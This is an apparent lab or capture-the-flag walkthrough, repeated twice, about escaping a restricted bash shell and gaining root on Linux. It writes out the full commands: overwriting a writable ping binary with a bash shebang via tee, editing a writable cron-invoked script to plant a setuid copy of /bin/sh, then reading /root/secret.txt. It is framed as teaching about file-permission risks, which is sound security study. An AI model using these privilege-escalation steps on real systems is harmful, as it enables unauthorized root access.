I SSH the system with restricted1, after login i found I was in a restricted bash shell (rbash).
I found that several commands were not allowed, and / character was allowed in arguments but not in the command name.
So I can’t call any commands by path.
so i have used below command to check files, and their permission.
I found that i have write permission to ping file.
and why there is tee command ? (its a hint)
so i have used tee command to write bash into ping using below command.
Then I run the ping command and i escaped from restricted shell.
I am no longer in a restricted of shell.
I set my ENV path so I don’t have to specify full paths to programs:
After performing lots of vulnerability test i found that there was a cron job running, so i have switch to
but the file had no write permission, but after checking the file using
that file was including another file from,
/usr/bin/mtr-check
and had write permission permission to check run,
so i had alter the content from below code, using nano editor.
cron will copy /bin/sh to my directory (restricted1) and setting the s flag using chmod 4755 (so i had setuid upon execution).
when i switch to /home/restricted1, i found ud64, after performing
i got root. to check performed
and finally to read content used below line,
hope this tutorial will help you to understand the security risk associated with vulnerability of improper file permission.
Thanks.. :) ./unknowndevice64
I found that several commands were not allowed, and / character was allowed in arguments but not in the command name.
So I can’t call any commands by path.
so i have used below command to check files, and their permission.
ls -la ./binI found that i have write permission to ping file.
and why there is tee command ? (its a hint)
so i have used tee command to write bash into ping using below command.
echo '#!' | tee ./bin/ping
echo '/bin/bash' | tee -a ./bin/pingThen I run the ping command and i escaped from restricted shell.
I am no longer in a restricted of shell.
I set my ENV path so I don’t have to specify full paths to programs:
export PATH=$PATH:/bin
export PATH=$PATH:/usr/binAfter performing lots of vulnerability test i found that there was a cron job running, so i have switch to
cd /etc/cron.minutely/mtr but the file had no write permission, but after checking the file using
cat /etc/cron.minutely/mtr that file was including another file from,
/usr/bin/mtr-check
and had write permission permission to check run,
ls -la /usr/bin/mtr-checkso i had alter the content from below code, using nano editor.
cp /bin/sh /home/restricted1/ud64 && chmod 4755 /home/restricted1/ud64 cron will copy /bin/sh to my directory (restricted1) and setting the s flag using chmod 4755 (so i had setuid upon execution).
when i switch to /home/restricted1, i found ud64, after performing
./ud64 i got root. to check performed
whoami and finally to read content used below line,
cat /root/secret.txt hope this tutorial will help you to understand the security risk associated with vulnerability of improper file permission.
Thanks.. :) ./unknowndevice64
No Comment to " How to escape root privilege in linux and root "